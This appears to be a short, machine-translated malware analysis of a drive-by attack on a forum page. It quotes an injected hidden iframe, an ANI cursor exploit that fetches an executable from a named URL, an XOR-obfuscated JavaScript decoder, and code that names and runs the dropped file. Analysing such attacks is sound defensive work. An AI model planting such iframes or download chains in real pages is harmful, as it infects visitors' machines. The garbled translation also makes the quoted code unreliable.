Trojan. mnless. Kip code is implanted in a new game trial zone of a forum and transmitted using the ani vulnerability.

EndurerOriginal
1Version

The added code is:
/---
<IFRAME src = 'hxxp: // s ** 72.91 ** 152 ** 0.net/site/g?##g/1##.htm' Height = 0 width = 50> </iframe>
---/

Hxxp: // s ** 72.91 ** 152 ** 0.net/site/g?##g/1##.htm contains:
/---
<Div
Style = "cursor: url('love.jpg ')"> </div> </body> <IFRAME src = hxxp: // s ** 72.91 ** 152 ** 0.net/site/g0000000000000000g/1000000004.htm name = "main1" Height = "0" width = "100"> </iframe>
---/
Love.jpg (Kaspersky reported as Exploit. win32.img-Ani. K) download http://mail.8u8y.com/ad/pic/1.exe

File Description: D:/test/1.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 12:39:24
Modification time: 12:40:32
Access time: 12:40:42
Size: 21479 bytes, 20.999 KB
MD5: 946bc00b1bcc782fade890c049e8e112

Kaspersky reportsTrojan-Downloader.Win32.Delf.bgaThe rising report isTrojan. mnless. Kip

Hxxp: // s ** 72.91 ** 152 ** 0.net/site/g00000000000000000000g/1000000004.htm's internal content is a criptscript code, and its function is self-defined:

/---
VaR z = function (m) {return string. fromcharcode (M ^ 79 )};
---/

Decrypt the code and run it through eval.

The decrypted content is still Javascript script code. The function is
Microsoft. XMLHTTP and SCR secure pting. FileSystemObject are used to download the hxxp: // mail.8 *** U *** 8y.com/ad/pic##/temp.exe, and saved to your windirfolder. The file name is self-defined:

/---
Function Gn (n) {var number = math. Random () * N;
Return '~ Tmp'{math.round(number={'.exe ';}
---/

Generate, that is ~ TMP *****. EXE, where ***** is a number. Run the program through the ShellExecute method of the Shell. Application Object Q.
Temp.exeis the same as 1.exe.